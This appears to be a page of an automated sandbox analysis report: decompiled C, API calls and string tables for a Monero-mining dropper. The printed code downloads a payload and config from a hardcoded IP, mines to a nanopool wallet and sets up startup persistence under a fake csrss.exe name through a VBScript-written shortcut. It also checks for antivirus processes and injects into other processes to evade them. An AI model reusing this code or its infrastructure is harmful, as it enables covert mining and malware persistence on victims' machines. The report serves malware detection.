                                                                                                                                          • Opcode Fuzzy Hash: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
                                                                                                                                          • Instruction Fuzzy Hash: E9F1F7F5E41704B7DB20ABB5AD06B9F36A86B50749F040437FA04B22D2E77C5A44CB6E
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00403220, Relevance: 65.0, APIs: 3, Strings: 34, Instructions: 237COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E00403220(void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _t10;
				intOrPtr _t14;
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t27;
				void* _t31;
				void* _t35;
				long _t37;
				short _t38;
				void* _t41;
				void* _t43;
				struct HINSTANCE__* _t44;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t48;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				struct HINSTANCE__* _t54;
				intOrPtr _t56;
				struct HINSTANCE__* _t58;
				struct HINSTANCE__* _t60;
				void* _t67;
				void* _t70;
				void* _t73;

				_t67 = __esi;
				_t43 = __ecx;
				 *0x5d1300 = 0;
				 *0x5d1304 = 0;
				 *0x5d1308 = 0;
				 *0x5d130c = 0;
				 *0x5d1310 = 0x7530;
				 *0x5d1238 = 0x5f;
				 *0x5d12bc = 0x18;
				 *0x5d19ac = 0x20;
				 *0x5d19b0 = 5;
				 *0x5d1318 = 0;
				 *0x5d131c = 0;
				 *0x5d1320 = 0;
				 *0x5d1bb8 = 1;
				 *0x5d1bbc = 0xa;
				 *0x5d1bc0 = 0;
				 *0x5d1c24 = 0;
				 *0x5d210c = 1;
				E00401BB0("[no-email]", 0, 0x80);
				E004017E0("[no-email]", "[no-email]");
				E004017E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
				asm("xorps xmm0, xmm0");
				 *0x5d1c48 = 0;
				asm("movups [0x5d1c28], xmm0");
				asm("movups [0x5d1c38], xmm0");
				E00401BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
				E00401BB0("csrss.exe", 0, 0x60);
				asm("xorps xmm0, xmm0");
				asm("movups [0x5d158c], xmm0");
				asm("movups [0x5d159c], xmm0");
				E00401BB0("http://45.144.225.135/notepad.exe", 0, 0x200);
				E00401BB0(0x5d12c0, 0, 0x40);
				E00401640(0x5d12c0, 0x409df0, 0x40);
				E00401BB0("http://45.144.225.135/config.txt", 0, 0x200);
				_t10 =  *0x5d19ac; // 0x20
				E00401640("http://45.144.225.135/config.txt", 0x409e30, _t10 + 1);
				E00401BB0("FALSE", 0, 0x200);
				_t14 =  *0x5d19b0; // 0x5
				E00401640("FALSE", "FALSE", _t14 + 1);
				_t17 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
				_t73 = _t70 + 0x90;
				if(_t17 != 0) {
					E00401CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x5d19ac);
					_t41 = E004017B0("FALSE", "FALSE");
					_t73 = _t73 + 0x18;
					if(_t41 != 0) {
						E00401CE0("0125789244697858", 0x10, "FALSE",  *0x5d19b0);
						_t73 = _t73 + 0x10;
					}
				}
				_t19 = E00408270(_t43, GetCurrentProcess());
				 *0x5d1314 = _t19;
				if(_t19 != 0) {
					E00408DD0();
					_t60 =  *0x5d1318; // 0x0
					_t61 =  ==  ? 1 : _t60;
					 *0x5d1318 =  ==  ? 1 : _t60;
				}
				_push(_t67);
				E004017B0("TRUE", "TRUE");
				_t44 =  *0x5d1300; // 0x1
				_t45 =  ==  ? 1 : _t44;
				 *0x5d1300 =  ==  ? 1 : _t44;
				E004017B0("TASKMGR", "TASKMGR");
				_t46 =  *0x5d1304; // 0x1
				_t47 =  ==  ? 1 : _t46;
				 *0x5d1304 =  ==  ? 1 : _t46;
				E004017B0("1THREAD", "50%CPU");
				_t48 =  *0x5d1308; // 0x2
				_t49 =  ==  ? 1 : _t48;
				 *0x5d1308 =  ==  ? 1 : _t48;
				E004017B0("50%CPU", "50%CPU");
				_t50 =  *0x5d1308; // 0x2
				_t51 =  ==  ? 2 : _t50;
				 *0x5d1308 =  ==  ? 2 : _t50;
				E004017B0("100%CPU", "50%CPU");
				_t52 =  *0x5d1308; // 0x2
				_t53 =  ==  ? 3 : _t52;
				 *0x5d1308 =  ==  ? 3 : _t52;
				E004017B0("100%CPU", "100%CPU");
				_t54 =  *0x5d130c; // 0x1
				_t55 =  ==  ? 1 : _t54;
				 *0x5d1bb4 = 0x1e;
				 *0x5d130c =  ==  ? 1 : _t54;
				E00401BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0, 0x100);
				_t27 =  *0x5d1238; // 0x5f
				E00401640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x409f40, _t27 + 1);
				E00401CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
				_t31 = E00401BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
				E00401BB0("xmr-us-east1.nanopool.org:14444", 0, 0x80);
				_t56 =  *0x5d12bc; // 0x18
				E00401640("xmr-us-east1.nanopool.org:14444", 0x40a018, _t56 + 1);
				E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
				_t35 = E00401BE0("xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
				if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
					ExitProcess(0x27);
				}
				E004018D0("xmr-us-east1.nanopool.org:14444", "nicehash.com");
				_t58 =  *0x5d131c; // 0x0
				_t59 =  !=  ? 1 : _t58;
				 *0x5d131c =  !=  ? 1 : _t58;
				_t37 = GetModuleFileNameW(0, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x200);
				if(_t37 == 0 || _t37 == 0x200) {
					_t38 = 0;
					 *0x5d1c4c = 0;
					goto L12;
				} else {
					_t38 = E00408B20("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "9dbcf183762872d8917b8a19535a0c65"); // executed
					if(_t38 == 0) {
						L12:
						 *0x5d1c28 = 0;
						 *0x5d2110 = 0;
						return _t38;
					} else {
						 *0x5d1c48 = 0;
						 *0x5d2110 = 0;
						return _t38;
					}
				}
			}


























                                                                                                                                          0x00403220
                                                                                                                                          0x00403220
                                                                                                                                          0x0040322c
                                                                                                                                          0x00403236
                                                                                                                                          0x00403240
                                                                                                                                          0x0040324a
                                                                                                                                          0x00403254
                                                                                                                                          0x0040325e
                                                                                                                                          0x00403268
                                                                                                                                          0x00403272
                                                                                                                                          0x0040327c
                                                                                                                                          0x00403286
                                                                                                                                          0x00403290
                                                                                                                                          0x0040329a
                                                                                                                                          0x004032a4
                                                                                                                                          0x004032ae
                                                                                                                                          0x004032b8
                                                                                                                                          0x004032c2
                                                                                                                                          0x004032cc
                                                                                                                                          0x004032d6
                                                                                                                                          0x004032e5
                                                                                                                                          0x004032f4
                                                                                                                                          0x004032fe
                                                                                                                                          0x00403301
                                                                                                                                          0x00403312
                                                                                                                                          0x00403319
                                                                                                                                          0x00403320
                                                                                                                                          0x0040332e
                                                                                                                                          0x00403338
                                                                                                                                          0x00403342
                                                                                                                                          0x00403349
                                                                                                                                          0x00403350
                                                                                                                                          0x00403361
                                                                                                                                          0x00403372
                                                                                                                                          0x00403383
                                                                                                                                          0x00403388
                                                                                                                                          0x00403399
                                                                                                                                          0x004033aa
                                                                                                                                          0x004033af
                                                                                                                                          0x004033c0
                                                                                                                                          0x004033d2
                                                                                                                                          0x004033d7
                                                                                                                                          0x004033dc
                                                                                                                                          0x004033f0
                                                                                                                                          0x004033ff
                                                                                                                                          0x00403404
                                                                                                                                          0x00403409
                                                                                                                                          0x0040341d
                                                                                                                                          0x00403422
                                                                                                                                          0x00403422
                                                                                                                                          0x00403409
                                                                                                                                          0x0040342d
                                                                                                                                          0x00403435
                                                                                                                                          0x00403441
                                                                                                                                          0x00403443
                                                                                                                                          0x00403448
                                                                                                                                          0x00403450
                                                                                                                                          0x00403453
                                                                                                                                          0x00403453
                                                                                                                                          0x00403459
                                                                                                                                          0x00403464
                                                                                                                                          0x00403469
                                                                                                                                          0x00403476
                                                                                                                                          0x0040347e
                                                                                                                                          0x00403484
                                                                                                                                          0x00403489
                                                                                                                                          0x00403496
                                                                                                                                          0x0040349e
                                                                                                                                          0x004034a4
                                                                                                                                          0x004034a9
                                                                                                                                          0x004034b6
                                                                                                                                          0x004034be
                                                                                                                                          0x004034c4
                                                                                                                                          0x004034c9
                                                                                                                                          0x004034d6
                                                                                                                                          0x004034e3
                                                                                                                                          0x004034e9
                                                                                                                                          0x004034ee
                                                                                                                                          0x004034fb
                                                                                                                                          0x00403508
                                                                                                                                          0x0040350e
                                                                                                                                          0x00403513
                                                                                                                                          0x00403520
                                                                                                                                          0x00403523
                                                                                                                                          0x00403534
                                                                                                                                          0x0040353a
                                                                                                                                          0x0040353f
                                                                                                                                          0x00403550
                                                                                                                                          0x0040356a
                                                                                                                                          0x0040357a
                                                                                                                                          0x0040358d
                                                                                                                                          0x00403592
                                                                                                                                          0x004035a4
                                                                                                                                          0x004035bb
                                                                                                                                          0x004035ce
                                                                                                                                          0x004035dd
                                                                                                                                          0x00403673
                                                                                                                                          0x00403673
                                                                                                                                          0x004035f8
                                                                                                                                          0x004035fd
                                                                                                                                          0x00403608
                                                                                                                                          0x00403617
                                                                                                                                          0x0040361d
                                                                                                                                          0x00403626
                                                                                                                                          0x00403657
                                                                                                                                          0x00403659
                                                                                                                                          0x00000000
                                                                                                                                          0x0040362f
                                                                                                                                          0x00403639
                                                                                                                                          0x00403643
                                                                                                                                          0x0040365f
                                                                                                                                          0x0040365f
                                                                                                                                          0x00403666
                                                                                                                                          0x00403670
                                                                                                                                          0x00403645
                                                                                                                                          0x00403645
                                                                                                                                          0x0040364c
                                                                                                                                          0x00403656
                                                                                                                                          0x00403656
                                                                                                                                          0x00403643

                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32(74B04D40), ref: 00403426
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,00000200), ref: 0040361D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentFileModuleNameProcess
                                                                                                                                          • String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$50%CPU$50%CPU$50%CPU$50%CPU$9dbcf183762872d8917b8a19535a0c65$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$http://45.144.225.135/config.txt$http://45.144.225.135/notepad.exe$nicehash.com$viTRMUuKeV$xmr-us-east1.nanopool.org:14444
                                                                                                                                          • API String ID: 2251294070-2739035969
                                                                                                                                          • Opcode ID: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
                                                                                                                                          • Instruction ID: 5c7772c3a6fcc4d75a1d869b2715d40eb421c31df5170a8a8dddbd709ea8cbad
                                                                                                                                          • Opcode Fuzzy Hash: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
                                                                                                                                          • Instruction Fuzzy Hash: DA919374781B007AE730AF66AC97F163BA0A760B45F14452FF500762E3D7F968489B8D
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004065D0, Relevance: 40.5, APIs: 5, Strings: 18, Instructions: 212sleepfileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E004065D0(void* __eflags) {
				short _v524;
				short _v1044;
				short _v1564;
				char _v2588;
				char _v3612;
				char _v4636;
				void* _t61;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t128;
				void* _t134;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t150;

				E00401A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
				E00401970( &_v524, "\\");
				E00401970( &_v524, "csrss.exe");
				 *((short*)(_t141 + E00401B40( &_v524) * 2 - 0x210)) = 0;
				E00401A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
				E00401970( &_v1044, L"\\r.vbs");
				_t61 = E00407FA0(0,  &_v3612, 0x40aad0, 7); // executed
				_t143 = _t142 + 0x38;
				if(_t61 != 0) {
					E00401970( &_v3612, "\\");
					E00401970( &_v3612, "viTRMUuKeV");
					E00401970( &_v3612, L".url");
					_t69 = E00406340( &_v524); // executed
					_t144 = _t143 + 0x1c;
					__eflags = _t69;
					if(_t69 == 0) {
						goto L1;
					} else {
						_t71 = E00407EF0("a2guard.exe"); // executed
						_t145 = _t144 + 4;
						__eflags = _t71;
						if(_t71 != 0) {
							L10:
							_t73 = E00407ED0( &_v3612);
							_t146 = _t145 + 4;
							__eflags = _t73;
							if(_t73 != 0) {
								goto L13;
							} else {
								E00401A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
								E00401970( &_v4636,  &_v524);
								E00401970( &_v4636, L".exe\"");
								_t100 = E00407AF0( &_v3612,  &_v4636);
								_t146 = _t146 + 0x20;
								__eflags = _t100;
								if(_t100 != 0) {
									goto L13;
								} else {
									goto L12;
								}
							}
						} else {
							_t102 = E00407EF0("a2service.exe"); // executed
							_t145 = _t145 + 4;
							__eflags = _t102;
							if(_t102 != 0) {
								goto L10;
							} else {
								_t103 = E00407EF0("a2start.exe"); // executed
								_t145 = _t145 + 4;
								__eflags = _t103;
								if(_t103 != 0) {
									goto L10;
								} else {
									_t105 = E00407ED0( &_v3612); // executed
									_t146 = _t145 + 4;
									__eflags = _t105;
									if(_t105 != 0) {
										L13:
										E00406990( &_v3612); // executed
										E00401A00( &_v1564,  &_v524);
										E00401970( &_v1564, L".exe");
										DeleteFileW( &_v1564); // executed
										MoveFileW( &_v524,  &_v1564); // executed
										E004068E0( &_v1564); // executed
										DeleteFileW( &_v524); // executed
										return 1;
									} else {
										E00401A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
										E00401970( &_v2588, L"outFile=\"");
										E00401970( &_v2588,  &_v3612);
										E00401970( &_v2588, L"\"\r\n");
										E00401970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
										E00401970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
										E00401970( &_v2588,  &_v524);
										E00401970( &_v2588, L".exe\"\"\"\r\n");
										E00401970( &_v2588, L"objFile.Close\r\n");
										_t128 = E00407AF0( &_v1044,  &_v2588); // executed
										_t150 = _t146 + 0x50;
										__eflags = _t128;
										if(__eflags == 0) {
											L12:
											__eflags = 0;
											return 0;
										} else {
											E00406A40(0, __eflags,  &_v1044); // executed
											Sleep(0xbb8);
											DeleteFileW( &_v1044); // executed
											_t134 = E00407ED0( &_v3612); // executed
											_t146 = _t150 + 8;
											__eflags = _t134;
											if(_t134 != 0) {
												goto L13;
											} else {
												return _t134;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}


























                                                                                                                                          0x004065e5
                                                                                                                                          0x004065f6
                                                                                                                                          0x00406607
                                                                                                                                          0x0040661f
                                                                                                                                          0x0040662e
                                                                                                                                          0x0040663f
                                                                                                                                          0x00406652
                                                                                                                                          0x00406657
                                                                                                                                          0x0040665c
                                                                                                                                          0x00406670
                                                                                                                                          0x00406681
                                                                                                                                          0x00406692
                                                                                                                                          0x0040669e
                                                                                                                                          0x004066a3
                                                                                                                                          0x004066a6
                                                                                                                                          0x004066a8
                                                                                                                                          0x00000000
                                                                                                                                          0x004066aa
                                                                                                                                          0x004066b0
                                                                                                                                          0x004066bb
                                                                                                                                          0x004066be
                                                                                                                                          0x004066c0
                                                                                                                                          0x00406800
                                                                                                                                          0x00406807
                                                                                                                                          0x0040680c
                                                                                                                                          0x0040680f
                                                                                                                                          0x00406811
                                                                                                                                          0x00000000
                                                                                                                                          0x00406813
                                                                                                                                          0x0040681f
                                                                                                                                          0x00406832
                                                                                                                                          0x00406843
                                                                                                                                          0x00406856
                                                                                                                                          0x0040685b
                                                                                                                                          0x0040685e
                                                                                                                                          0x00406860
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406860
                                                                                                                                          0x004066c6
                                                                                                                                          0x004066cb
                                                                                                                                          0x004066d0
                                                                                                                                          0x004066d3
                                                                                                                                          0x004066d5
                                                                                                                                          0x00000000
                                                                                                                                          0x004066db
                                                                                                                                          0x004066e0
                                                                                                                                          0x004066e5
                                                                                                                                          0x004066e8
                                                                                                                                          0x004066ea
                                                                                                                                          0x00000000
                                                                                                                                          0x004066f0
                                                                                                                                          0x004066f7
                                                                                                                                          0x004066fc
                                                                                                                                          0x004066ff
                                                                                                                                          0x00406701
                                                                                                                                          0x00406869
                                                                                                                                          0x00406870
                                                                                                                                          0x00406883
                                                                                                                                          0x00406894
                                                                                                                                          0x004068a3
                                                                                                                                          0x004068b3
                                                                                                                                          0x004068c0
                                                                                                                                          0x004068cf
                                                                                                                                          0x004068da
                                                                                                                                          0x00406707
                                                                                                                                          0x00406713
                                                                                                                                          0x00406724
                                                                                                                                          0x00406737
                                                                                                                                          0x00406748
                                                                                                                                          0x00406759
                                                                                                                                          0x0040676a
                                                                                                                                          0x0040677d
                                                                                                                                          0x0040678e
                                                                                                                                          0x004067a2
                                                                                                                                          0x004067b5
                                                                                                                                          0x004067ba
                                                                                                                                          0x004067bd
                                                                                                                                          0x004067bf
                                                                                                                                          0x00406862
                                                                                                                                          0x00406862
                                                                                                                                          0x00406868
                                                                                                                                          0x004067c5
                                                                                                                                          0x004067cc
                                                                                                                                          0x004067d9
                                                                                                                                          0x004067e6
                                                                                                                                          0x004067ef
                                                                                                                                          0x004067f4
                                                                                                                                          0x004067f7
                                                                                                                                          0x004067f9
                                                                                                                                          0x00000000
                                                                                                                                          0x004067fb
                                                                                                                                          0x004067ff
                                                                                                                                          0x004067ff
                                                                                                                                          0x004067f9
                                                                                                                                          0x004067bf
                                                                                                                                          0x00406701
                                                                                                                                          0x004066ea
                                                                                                                                          0x004066d5
                                                                                                                                          0x004066c0
                                                                                                                                          0x0040665e
                                                                                                                                          0x0040665e
                                                                                                                                          0x00406663
                                                                                                                                          0x00406663

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00407FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
                                                                                                                                            • Part of subcall function 00407FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
                                                                                                                                            • Part of subcall function 00407FA0: CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
                                                                                                                                            • Part of subcall function 00407FA0: FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6
                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 004067D9
                                                                                                                                          • DeleteFileW.KERNELBASE(?), ref: 004067E6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
                                                                                                                                          • String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
                                                                                                                                          • API String ID: 976351581-227138989
                                                                                                                                          • Opcode ID: ed21da9ed8190e7733910bd8be6d59d110209caacd492b3d501ff56708a1c162
                                                                                                                                          • Instruction ID: e23f127453d0789cff49e1510112eb27c4226e1f4d3e58430ef8cc7bba816ee8
                                                                                                                                          • Opcode Fuzzy Hash: ed21da9ed8190e7733910bd8be6d59d110209caacd492b3d501ff56708a1c162
                                                                                                                                          • Instruction Fuzzy Hash: B46101B2D4031C66DB50E6A19C46ECB726C5F05348F0408F7B505F2192EA7DEBA58BAA
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00406A40, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 180processCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E00406A40(void* __ecx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				char _v612;
				char _v740;
				short _v1780;
				char _v5876;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t38;
				int _t48;
				void* _t54;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t76;
				signed int _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t84;

				_t71 = __ecx;
				E00401BB0( &_v5876, 0, 0x1000);
				_v8 = 0;
				E00401BB0( &_v740, 0, 0x288);
				E00401670( &_v740, 0, 0x288);
				_t74 = _a4;
				E00401A00( &_v612, _a4);
				_t38 = E00407ED0(_a4); // executed
				_t82 = _t81 + 0x30;
				if(_t38 == 0) {
					return _t38;
				}
				_push(_t68);
				_push(_t76);
				if(E00408DD0() == 0) {
					L22:
					E00401BB0( &_v92, 0, 0x44);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x14], xmm0");
					E00401A00( &_v1780, L"cmd.exe /C WScript \"");
					E00401970( &_v1780, _t74);
					E00401970( &_v1780, "\"");
					_t48 = E00407ED0(_t74); // executed
					if(_t48 != 0) {
						CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
						CloseHandle(_v24.hThread);
						_t48 = CloseHandle(_v24);
					}
					L24:
					return _t48;
				}
				_t54 = E00407EF0("bdagent.exe"); // executed
				_t84 = _t82 + 4;
				if(_t54 != 0) {
					L10:
					_push(0x1000);
					_push( &_v5876);
					if( *0x5d1314 == 0) {
						_push(0);
						_t48 = E004029E0( &_v740, 0x400000, E004080E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E00406CA0);
						_t82 = _t84 + 0x24;
						if(_t48 == 0 || _v8 == 0) {
							goto L22;
						} else {
							goto L24;
						}
					}
					_push(1);
					_t70 = E004080E0(_t68, _t74, _t76);
					_t82 = _t84 + 0xc;
					if(_t70 == 0) {
						goto L22;
					}
					_t79 = 0;
					if(_t70 == 0) {
						goto L22;
					}
					do {
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {
							goto L18;
						}
						_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {
							goto L18;
						}
						_t48 = E004029E0(_t71, 0x400000, _t75,  &_v740, 0x288,  &_v8, E00406CA0);
						_t82 = _t82 + 0x18;
						if(_t48 != 0 && _v8 != 0) {
							goto L24;
						}
						L18:
						_t79 = _t79 + 1;
					} while (_t79 < _t70);
					_t74 = _a4;
					goto L22;
				}
				_t61 = E00407EF0("vsserv.exe"); // executed
				_t84 = _t84 + 4;
				if(_t61 != 0) {
					goto L10;
				}
				_t62 = E00407EF0("cfp.exe"); // executed
				_t84 = _t84 + 4;
				if(_t62 != 0) {
					goto L10;
				}
				_t63 = E00407EF0("ccavsrv.exe"); // executed
				_t84 = _t84 + 4;
				if(_t63 != 0) {
					goto L10;
				}
				_t64 = E00407EF0("cmdagent.exe"); // executed
				_t84 = _t84 + 4;
				if(_t64 != 0) {
					goto L10;
				}
				_t65 = E00407EF0("avp.exe"); // executed
				_t84 = _t84 + 4;
				if(_t65 != 0) {
					goto L10;
				}
				_t66 = E00407EF0("avpui.exe"); // executed
				_t84 = _t84 + 4;
				if(_t66 != 0) {
					goto L10;
				}
				_t67 = E00407EF0("ksde.exe"); // executed
				_t82 = _t84 + 4;
				if(_t67 == 0) {
					goto L22;
				}
				goto L10;
			}
































                                                                                                                                          0x00406a40
                                                                                                                                          0x00406a58
                                                                                                                                          0x00406a68
                                                                                                                                          0x00406a72
                                                                                                                                          0x00406a85
                                                                                                                                          0x00406a8a
                                                                                                                                          0x00406a95
                                                                                                                                          0x00406a9b
                                                                                                                                          0x00406aa0
                                                                                                                                          0x00406aa5
                                                                                                                                          0x00406c9a
                                                                                                                                          0x00406c9a
                                                                                                                                          0x00406aab
                                                                                                                                          0x00406aac
                                                                                                                                          0x00406ab4
                                                                                                                                          0x00406c0e
                                                                                                                                          0x00406c16
                                                                                                                                          0x00406c21
                                                                                                                                          0x00406c2a
                                                                                                                                          0x00406c2e
                                                                                                                                          0x00406c3b
                                                                                                                                          0x00406c4c
                                                                                                                                          0x00406c52
                                                                                                                                          0x00406c5c
                                                                                                                                          0x00406c7e
                                                                                                                                          0x00406c8d
                                                                                                                                          0x00406c92
                                                                                                                                          0x00406c92
                                                                                                                                          0x00406c94
                                                                                                                                          0x00000000
                                                                                                                                          0x00406c95
                                                                                                                                          0x00406abf
                                                                                                                                          0x00406ac4
                                                                                                                                          0x00406ac9
                                                                                                                                          0x00406b46
                                                                                                                                          0x00406b53
                                                                                                                                          0x00406b58
                                                                                                                                          0x00406b59
                                                                                                                                          0x00406bd6
                                                                                                                                          0x00406bf8
                                                                                                                                          0x00406bfd
                                                                                                                                          0x00406c02
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406c02
                                                                                                                                          0x00406b5b
                                                                                                                                          0x00406b62
                                                                                                                                          0x00406b64
                                                                                                                                          0x00406b69
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406b6f
                                                                                                                                          0x00406b73
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406b80
                                                                                                                                          0x00406b88
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406b8a
                                                                                                                                          0x00406b99
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406bb6
                                                                                                                                          0x00406bbb
                                                                                                                                          0x00406bc0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406bcc
                                                                                                                                          0x00406bcc
                                                                                                                                          0x00406bcd
                                                                                                                                          0x00406bd1
                                                                                                                                          0x00000000
                                                                                                                                          0x00406bd1
                                                                                                                                          0x00406ad0
                                                                                                                                          0x00406ad5
                                                                                                                                          0x00406ada
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406ae1
                                                                                                                                          0x00406ae6
                                                                                                                                          0x00406aeb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406af2
                                                                                                                                          0x00406af7
                                                                                                                                          0x00406afc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406b03
                                                                                                                                          0x00406b08
                                                                                                                                          0x00406b0d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406b14
                                                                                                                                          0x00406b19
                                                                                                                                          0x00406b1e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406b25
                                                                                                                                          0x00406b2a
                                                                                                                                          0x00406b2f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00406b36
                                                                                                                                          0x00406b3b
                                                                                                                                          0x00406b40
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
